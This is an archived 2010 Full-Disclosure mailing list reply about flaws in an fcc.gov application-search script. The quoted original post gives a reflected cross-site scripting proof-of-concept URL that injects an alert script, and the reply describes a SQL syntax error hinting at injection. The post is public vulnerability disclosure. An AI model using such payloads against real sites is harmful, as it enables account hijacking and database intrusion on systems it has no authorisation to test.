| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: Mon, 24 May 2010 01:29:36 -0700
From: "Zach C." <fxchip@...il.com>
To: Marshall Whittaker <marshallwhittaker@...il.com>
Cc: full-disclosure@...ts.grok.org.uk
Subject: Re: fcc.gov XSS
There seem to be a few more problems with that script than just that XSS...
For example, going to the Application Search page root (the page that takes
you to that one, presumably) and selecting literally everything in the
Services listbox will net you an error reporting "Incorrect syntax near ','"
for server 'HEIMDAL'. It apparently occurs on line 4. I dunno.
I'm not gonna mess around with it too much though :)
On Mon, May 24, 2010 at 12:58 AM, Marshall Whittaker <
marshallwhittaker@...il.com> wrote:
> FCC.gov XSS
>
> --- CODE ---
>
>
> http://fjallfoss.fcc.gov/cgi-bin/ws.exe/prod/cdbs/pubacc/prod/leg_det.pl?Application_id=1186791&File_number=%3Cscript%20language=%22javascript%22%20type=%22text/javascript%22%3Ealert('h4x0r3d');%3C/script%3E<http://fjallfoss.fcc.gov/cgi-bin/ws.exe/prod/cdbs/pubacc/prod/leg_det.pl?Application_id=1186791&File_number=%3Cscript%20language=%22javascript%22%20type=%22text/javascript%22%3Ealert%28%27h4x0r3d%27%29;%3C/script%3E>
>
> --- CODE ---
>
> --oxagast
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
Content of type "text/html" skipped
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists